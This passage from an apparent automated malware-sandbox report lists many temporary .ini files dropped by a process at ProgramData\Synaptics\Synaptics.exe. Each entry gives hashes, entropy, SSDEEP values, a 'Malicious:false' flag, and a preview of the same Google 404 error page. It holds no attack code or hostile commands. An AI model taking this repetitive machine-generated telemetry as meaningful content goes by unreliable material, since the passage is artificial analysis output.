                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.270294339991757
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+08SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+z+pAZewRDK4mW
                                                                                                                                                                                        MD5:65FB0CFD995475BCAE523A2C738C9663
                                                                                                                                                                                        SHA1:5FA7CA33B5CD924248AC9AFD8415D6DDD1D57EC1
                                                                                                                                                                                        SHA-256:FFB92639AE7EB23F56CC842A367A1C4D149D16E856FA503248E4B0E4DF4E4F97
                                                                                                                                                                                        SHA-512:C983358B82CBE04B0C2E579FF94FE1234A43A72EF07D05259E0BA057DA74A28D61479B9A043E9D06DE32C8AA198247D4325B10B8BFCF01FA65336DCE213EE70A
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="/7f+RkBhKE6E/ifBBBfPIA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\GcGyrVp.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.269654676865149
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+09SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+W+pAZewRDK4mW
                                                                                                                                                                                        MD5:67F8D18F84C0A562EC7B99D2DB60BB7C
                                                                                                                                                                                        SHA1:320673CACA39D592E3575B3EC7024A34EF42D62F
                                                                                                                                                                                        SHA-256:76E27D96DC1D98B9C35776F64E9AB8FAAC5BB1D59DBF8258A4CCB4BE2900FAB3
                                                                                                                                                                                        SHA-512:52800F5F908D2A4C7615216B179471AA38614ABDC920EA5C5070C9A396647DFD4C76842B7C26F2E2A3904AF002C0A4C5290D85B417ADB0C5B0ED77F904409D86
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZXdKu79tYwm6ZO/PL9wwSA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\GubIRjw.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.276679308861654
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0wGA1SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+S0+pAZewRDK4mW
                                                                                                                                                                                        MD5:5702B78175E5AAC707C9EA23B3A40106
                                                                                                                                                                                        SHA1:6A9EEF4659EADA6F7AA2EE8E6002EAF627CAFFFE
                                                                                                                                                                                        SHA-256:F8E2443493A275F78939214773B42F2DF3E2E46E1167FA9E98DD144623D77B90
                                                                                                                                                                                        SHA-512:526F741C64C6A22EF38E0D7B5349D0A10327602EE335B41D6A22EF2CABC3529383748F6A31A48727F9387DE295D25DFCE11C5786F38091DE7E44FA631081F67F
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Z63r45jtKSUc95823PXVMA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\H6c5TgX.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.263728546974285
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0iSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+9+pAZewRDK4mW
                                                                                                                                                                                        MD5:44C18AEF147D95B7697D273014EADF8F
                                                                                                                                                                                        SHA1:4324D34EA2F555F2B54B9842D9E0A6FE7E80B7BC
                                                                                                                                                                                        SHA-256:F6D67B4E5D6FF1EBA49B17A1CA49DA6EF751F1066585C8E8CB28328A1FEC538B
                                                                                                                                                                                        SHA-512:D889AABF696FC825058874002B69227284121E976B04100FA3DEDC72DEE3B47B7ADF6DBE96C640B67DC3F186BEA8D7D0AC293511516A36504335EECD0355A9AB
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="APEyuCxyGzsqv6M56//Efg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\HJ56qWC.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.254575341285324
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0uISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+/I+pAZewRDK4mW
                                                                                                                                                                                        MD5:47F795AA33B4FC5B96CB017A7B5A0C2B
                                                                                                                                                                                        SHA1:725DF4FCF34618215CCA91FC952C84A96F4276DF
                                                                                                                                                                                        SHA-256:9368205233AAAC64AEA5708D8C0520B0FCF74BFA26A11743A53460B4DE6395ED
                                                                                                                                                                                        SHA-512:BE8033922C69B3775B6EADC8CDB17C3F7D22CF5EB0CE2C248337B7A35B0F4C78A4A5BB39CEBBBEB8165F76F256D14CBE463FBB24C10972360EADB991AB9AE177
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CoT4aVV/nzMwaYH3o/9Uvg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\HmZV5Qb.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2823178393659695
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0gbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+hb+pAZewRDK4mW
                                                                                                                                                                                        MD5:C5401B0A2C708514A083222B9BA47B14
                                                                                                                                                                                        SHA1:75493019DF7C6263DB6BEDCB3B82B1C9B1994FF1
                                                                                                                                                                                        SHA-256:1936095516F032743CABA965D6AECD05FEE3826426599BEE6A8AB7E9E220010F
                                                                                                                                                                                        SHA-512:12229E89A85855E57528CA05418DD4FA0397A54EFEBD749DCEC55ABEBD4E9F870953B52E5C0A827E4EF117BBAFBD117919580465159D34CE337143110605C3BF
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="D5DQpKCu3YbWHGVAjGYLtA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\I5mbnMn.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.262702660145862
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+00bwSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+5bw+pAZewRDK4mW
                                                                                                                                                                                        MD5:D33C9C50CF2B81C44D7D01B78ACC87F7
                                                                                                                                                                                        SHA1:02A32D12D36A5E9ADE2C9ED55D40C9423E73259F
                                                                                                                                                                                        SHA-256:43597241F7166500EC110DC662EC98F116397B2816D760E1E9A2CD377BC4B84B
                                                                                                                                                                                        SHA-512:3606EA4F65F8254F9031062E079A821B35B4D2EC18CA39A33D13E999C75E1BE4D0A817F98825199AAF4419F73EB9ADDF5A33C96DDAED982B194C6827AF6C78CB
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pn03uaY5cZDO6E2PAA7Phg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\JD5cbSo.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.266715799818652
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0VSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+++pAZewRDK4mW
                                                                                                                                                                                        MD5:F34F53176F521324BADDF891431F4A1A
                                                                                                                                                                                        SHA1:FA23C38A03EE1681E7516286E1353262DBFE1CDA
                                                                                                                                                                                        SHA-256:8576973295236ECAC03A7DC2AD220F8FCAFB3E6B6A6AD6E029A7D7FE971841E4
                                                                                                                                                                                        SHA-512:BD8C452634443EFD9AF4C49B18232E1E48F0C75A489FC4D95E07BEA9417BFC13B7A59490333550D0E746C53B6C6212F7371E52442AD739E127917AEFEFB09271
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U0cPZPkF4vEIPNiXk6pmcA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\JOZmWlB.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.253612633431508
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+01SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+i+pAZewRDK4mW
                                                                                                                                                                                        MD5:85D7F7E3EA105B946BE31CD339D9D64D
                                                                                                                                                                                        SHA1:7E524BD567BB49485C685F57A3D0405834B8B1DA
                                                                                                                                                                                        SHA-256:A9B3BA3640EA1C7834147BBB800C8D9E2389EB025E9128551B6C0A943A36EB63
                                                                                                                                                                                        SHA-512:4451EE0275CA54FE0640E2316C14F61C47F59D4185091D5A1E8F8C6A64043700DE8719F23921E986A3D701F9F54752DEDE36BA49A91CB2F31F1006C126A17745
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cvM7Kx1528N2Hrtzg3FotQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Jjrxenf.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.267291046441693
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0guVbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+n8+pAZewRDK4mW
                                                                                                                                                                                        MD5:9FF9B5AFFDF10FAF73B6606C1C68B68D
                                                                                                                                                                                        SHA1:25A6A3196B9150A1310ADCAA7093FC675E5BBE55
                                                                                                                                                                                        SHA-256:C8D69E7A604217D3DD8A53EBCD5628AE613A3135EAB5E1BFB78952EAE1447BC7
                                                                                                                                                                                        SHA-512:EBECD9A5A4B75C6D1D65FEB3CAA6BD92355D7361DAD0597847E7D970B0705A65FE5C19854F1690462E6EEEAD4B5B5C7EA4CBA0415AF6D376051426ABBF25DFEF
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="naSXsQsC4/z+dpiKIjBMWw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\JmLtOJu.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.260458512619608
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+08Vy3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+y3+pAZewRDK4mW
                                                                                                                                                                                        MD5:53998693D342C3185569C8F3DE2FD5FC
                                                                                                                                                                                        SHA1:432CB20ACC39059E982526EDE4245867BBC80D47
                                                                                                                                                                                        SHA-256:1EBD4EE02548C3C64C6A4F3A39DC09B29D9683521656F4E165BD64ECA6F50022
                                                                                                                                                                                        SHA-512:0BD031C3E8F170FEBBF764C43FFDD1B091CCAD42D4351546EEACD41B9E9F522AFD2B34BCB0D7FB54570820243F600EB5A45570C633075439D687837578195ED5
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Asrgq2q9lWQGlDLuviCU8w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\K9qihuv.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2580048229823495
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0U2bSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+d2b+pAZewRDK4mW
                                                                                                                                                                                        MD5:7C3050730989BA00129191BF648704A6
                                                                                                                                                                                        SHA1:AC49D70AB5BDE95989E184EFE47EF32237D56B7C
                                                                                                                                                                                        SHA-256:D4062378C188984AC723771B80C43B29CE96F5467EAC009289AD49097D72A4F4
                                                                                                                                                                                        SHA-512:F4488DD34C6075E6F50BF383B10AE38E39E879656F08C2540EFA98334B4A9F8DEC9F173A08387B689F7196B7E6C9294232D921A5432AC384A14FFE23049507B4
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nOT4RS8wnaclaLYSMpC2uA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\KRp9bl4.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.264422312082922
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0K3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+d+pAZewRDK4mW
                                                                                                                                                                                        MD5:0FD1ABDA9471254A8587EDC0AE26C8CE
                                                                                                                                                                                        SHA1:12383EE9A751141FD2012593B546B7929D5C99CB
                                                                                                                                                                                        SHA-256:A64F2F9E923F60AF9674D4BBF5BF08804A2B465DC70D4792B637992A16D16719
                                                                                                                                                                                        SHA-512:AA81BDA20B9FB37128C1458E304AA52FE0ADE0D1120779B408E7B3B43E6222A5DB52ECD1D2ED26B00ADC3C0541F28C8E6ED4F5570A6AEE5B279D2B0E75D53995
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="R1AeBY4N5dew5MPRyjbrJQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Kcv6tPL.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.262053583342563
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+071SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+e+pAZewRDK4mW
                                                                                                                                                                                        MD5:082F40440D0E9746AC5FA1E2941F0776
                                                                                                                                                                                        SHA1:323EEC592A8457D5AEC5B30ECF07A5B85E4F6F2E
                                                                                                                                                                                        SHA-256:AAA955A386D34F94A144BA628338983EC4B3C26AB12919065DFC8F1AAE7E8106
                                                                                                                                                                                        SHA-512:2A5946D794B7B10020E7EEB68E43437B68DA8C59C2CF756113DABA9492B339F73B2EA90D16746C7FEFD430E42E77758AC9FBCCE18485AA6BD46ED2D0D0EAF169
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="V0fvpuVFSnT+sIQ0Jo/GPw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\LQLMFu2.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
